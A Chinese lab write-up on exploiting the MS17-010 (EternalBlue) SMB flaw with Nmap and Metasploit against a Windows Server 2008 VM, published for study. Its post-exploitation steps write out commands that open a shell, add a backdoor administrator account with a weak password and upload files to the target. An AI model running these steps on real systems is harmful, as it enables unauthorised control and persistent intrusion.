当前位置: 首页 > news >正文

内网安全:MS17-010漏洞原理

本次实验属于内网SMB漏洞利用实操内容。

设备

VMware 虚拟机、Windows Server 2008(靶机)、Kali Linux

IP 规划

靶机:Windows Server 2008 x64 虚拟机,IP 地址:192.168.XXX.XXX,未安装 MS17-010 安全补丁,关闭系统防火墙。

检测终端:Kali Linux 虚拟机,IP 地址:192.168.xxx.xxx,预装 Nmap、Metasploit 工具集

SMB 协议基础

SMB即服务器消息块协议,是Windows操作系统专属内网通信协议,主要实现局域网文件共享、打印机共享、进程管道通信、远程管理等功能,依靠两个核心端口提供服务:
1. 139端口:基于NetBIOS协议传输SMB数据,多用于老旧Windows系统主机名解析、局域网共享访问;
2. 445端口:TCP直连SMB服务,现代Windows系统主流端口,无需依赖NetBIOS即可直接完成共享通信。
SMB是内网渗透横向移动最常用载体,攻击方式分为两类:一是合法凭据滥用,持有账号密码后通过IPC$、WMI、SMB远程执行命令横向扩散;二是协议代码漏洞利用,无需账号密码,直接通过漏洞代码执行任意系统指令,MS17-010永恒之蓝就属于此类高危漏洞。

MS17-010漏洞原理

漏洞成因:Windows系统处理SMB协议特殊数据包时存在内存溢出缺陷,攻击者可构造恶意SMB数据包发送至目标445端口,绕过系统权限校验,直接写入恶意执行代码,实现远程代码执行。
影响范围:Windows Vista、Windows 7、Windows Server 2008、Windows Server 2012等未安装对应安全补丁的系统。
危害等级:高危,无凭据远程代码执行,攻击者直接获取系统最高管理员权限。
真实场景:企业内网大量老旧服务器未及时打补丁,黑客通过该漏洞批量控制内网主机,植入勒索病毒、窃取业务数据、搭建后门长期驻留内网。

步骤1:实验环境部署与网络连通校验

1. Kali操作
打开终端执行权限提升命令,切换至root管理员身份,避免工具权限不足问题:
sudo su 输入系统密码后完成权限切换。
2. 靶机Windows Server 2008配置
打开控制面板→系统和安全→Windows防火墙,仅在实验环境下关闭防火墙,现实环境严禁操作


3. 网络连通测试
在Kali终端执行ping命令,测试两台虚拟机网络连通性:


返回数据包无丢失,实验环境正常。

步骤2:Nmap主机与端口信息收集

使用Nmap综合扫描脚本,探测靶机操作系统版本、开放端口、服务版本信息:
nmap -T4 -O -v -sV 192.168.xxx.xxx
扫描完成后查看输出结果,确认139、445端口状态为开放,SMB共享服务正常运行,满足漏洞利用前置条件。

步骤3:MS17-010安全风险检测学习

1. Nmap内置安全检测脚本对实验环境里的靶机进行安全检查:
nmap --script=vuln 192.168.xxx.xxx -v
扫描结果提示目标主机存在MS17-010风险。


2. 启动Metasploit渗透框架:msfconsole


3. 在框架内搜索MS17-010相关模块:search ms17-010


4. 加载漏洞探测模块(序号0)
5. 查看模块需要配置的参数
6. 设置靶机IP地址参数


7. 执行漏洞探测:run

步骤4:后渗透操作

1. 调用靶机交互式CMD命令行: shell
2. 解决中文文件名、提示乱码问题:chcp 65001


3. 创建后门管理员账号,设置密码123456
net user admin123 123456 /add
4. 将新建账号加入本地管理员组,获取最高权限:
net localgroup administrators admin123 /add


5. 输入exit退出CMD终端,回到Meterpreter环境,上传本地测试脚本至靶机C盘根目录:
upload /home/kali/test.bat C:\\


本文所有内容仅作为课程理论学习,全部操作仅在本人搭建的虚拟机环境完成,严格遵守《网络安全法》,不对非授权设备进行扫描和测试。

http://www.jsqmd.com/news/1145001/

相关文章:

  • JAVA练习274-分割等和子集
  • c sharp基础
  • 你要是想1天盘点完3000台设备资产——RFID资产管理系统可以!
  • 【LLM】qwen3.5-9b
  • 数学建模竞赛模型选择指南:5类算法在母婴数据预测问题中的性能对比
  • 这次终于选对了!盘点2026年普遍认可的AI论文平台
  • 新手小白还搞不懂Python?来这里我将用最直白,最简单,最好绷的语言一步一步教会你Python的下载,环境搭建以及多版本管理
  • 2026WAIC展品地图:大模型、国产算力、人形机器人……8 大类全在这
  • Selenium IDE使用指南三(控制流)
  • 想找优质靠谱公司?看看陕西GEO优化报价,给你满意之选!
  • Claude Code Sonnet 5模型Token成本优化与PR评审实战指南
  • 微信聊天记录删了怎么找回?全套官方恢复方法,无备份也有补救渠道
  • 2026年,揭秘苦荞米背后的专业匠心与健康秘密
  • 许可证管理智能化:AI技术如何赋能高效管理?
  • 简历审查Agent工程化收尾:模型坑位、线程安全、超时兜底与RAG预告
  • AGENT实例-智能体量化交易真相:告别算命,拥抱信息差
  • 4-1word文档的排版
  • 2026婚宴市场巨变:摩卡婚礼,凭什么被北京五星酒店集体选择?
  • 《用AI做公众号流量主》第1课:为什么是公众号流量主
  • 第五章第二节:循环结构(while/do-while/for)
  • OpenClaw龙虾ai Windows、macOS部署教程 内置运行环境一键安装流程
  • Python scikit-learn 1.4 实战:5种相似度算法在推荐系统中的性能对比
  • 有没有不泄露文稿、改写自然的AI论文降重?筛选标准是什么?
  • 医美仪器配件采购:兼顾性价比与量产稳定性选型思路
  • 儿童面部彩绘怎么选?从成分到效果的全方位指南
  • 【单片机毕业设计】基于 STM32/51 单片机的 8 路病床无线呼叫对讲系统设计,基于 NRF24L01 的病房智能呼叫与输液监测装置开发(020301)
  • 玩转Rust高级应用 怎么理解在标准库中,有一个std::intrinsics模块,它里面包含了一系列的编译器内置函数
  • 3分钟解决XGP存档迁移难题:Python脚本实现游戏进度无损转移
  • 复杂网络节点挖掘 3 类方法对比:中心性、影响力与社区结构,5 大指标实战解析
  • Windows和Office智能激活终极指南:5分钟完成永久激活